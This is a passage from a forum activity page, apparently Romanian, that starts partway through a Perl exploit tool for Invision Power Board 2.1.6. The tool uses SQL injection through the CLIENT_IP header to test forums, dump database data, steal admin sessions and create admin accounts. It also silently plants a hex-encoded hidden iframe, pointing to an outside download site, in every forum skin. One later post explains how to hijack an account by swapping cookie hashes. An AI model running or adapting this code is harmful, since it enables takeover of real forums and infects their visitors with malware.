=~ /ipb_var_s(s*)=(s*)"(.*)"/) { $name = $3; } } $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack; $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } if($error) { $InfoWindow->add('Label', -text => 'Can't get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } sub get_data() { $xpl = LWP::UserAgent->new( ) or die; $InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK wrote: ); if($table eq 'members') { $id_text = 'id'; } if($table eq 'members_converge') { $id_text = 'converge_id'; } $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*"); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/){ $report = $3; } else { $InfoWindow->add('Label', -text => 'Can't get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; $InfoWindow->Show(); $InfoWindow->destroy; } } sub create_admin() { $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK wrote: ); if($session_id eq '' || $session_ip_address eq '') { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack; } elsif($session_ip_address !~ /d{1,3}.d{1,3}.d{1,3}.d{1,3}/) { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack; } else { $xpl = LWP::UserAgent->new( ) or die; ($url2 = $url) =~ s/index.php/admin.php/; $cf = ''; %fields = ( 'code' => 'doadd', 'act' => 'mem', 'section' => 'content', 'name' => $new_admin_name, 'password' => $new_admin_password, 'email' => $new_admin_email, 'mgroup' => $group, ); if($use_custom_fields) { @cf = split(',',$custom_fields); foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;} } $res = $xpl->post($url2."?adsess=$session_id", [ %fields, ], 'USER_AGENT'=>'', 'CLIENT_IP'=>"$session_ip_address", 'X_FORWARDED_FOR'=>"$session_ip_address"); $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E'; $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")"; $res = $xpl->post($url2."?adsess=$session_id", [ 'code' => 'runsql', 'act' => 'sql', 'section' => 'admin', 'query' => $query, ], 'USER_AGENT'=>'', 'CLIENT_IP'=>"$session_ip_address", 'X_FORWARDED_FOR'=>"$session_ip_address"); $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub test_vuln() { $InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK wrote: ); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*"); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; } if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub get_prefix() { $InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK wrote: ); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'"); if($res->is_success) { $rep = ''; if($res->as_string =~ /FROM (.*)sessions/) { $prefix = $1; $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; } else { $InfoWindow->add('Label', -text => 'Can't get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub session() { return 'r57ipb216_for_IDS'; } # milw0rm.com [2006-07-14][/list:u] Search: Invision Power Board v2.1.6
  17. Screech
    Daca aveti un hash al unui admin/user de pe vreun forum ipb si nu aveti chef sa-l decriptati sau timp... puteti inlocui in coockie si gata intrati in contul lui. Merge doar pe Opera (9) Intrati la Tools>Quick preferences>Edit site preferences, aici alegeti prajiturelele si o sa va apara: Acum editati la member_id si la pass_hash astfel:
  18. Screech
    http://www.rosecurityteam.net/home/viewtop...opic.php?t=1418
  19. Screech
    Bine ai venit! dar e ceva ce nu-mi place la tine, ai 7 mesaje si acelea doar cu "Multumesc"
  20. Screech

    Fun stuff

    Screech replied to Wisa's topic in Discutii non-IT

    Asa face kwerln cu noi daca-l suparam
  21. Screech
    mario23, mersi ptr ele dar te mai opresti
  22. Screech

    iDiOt BoY

    Screech posted a topic in Cosul de gunoi

    Tocmai intra asta pe mine, e sigur cineva de pe forum il banuiesc pe nos... dar nu zis ca e el sigur Da ce mintalitate a inversat cele 2 cuvinte folosite de mine ptr ID si si-a facut un altul )
  23. Screech
    <div class='quotetop'>QUOTE("tester")</div> Ha Ha[/list:u] Ha ">SFD"ef pe asta unde l-ati gasit ma?
  24. Screech
    <div class='quotetop'>QUOTE("ghici")</div> mama lui eu am pus pe evonet
  25. Screech
    mersi pare ca e ceva de capu lui, dar eu am incercat pe mine si nu primesc nimic
×
×
  • Create New...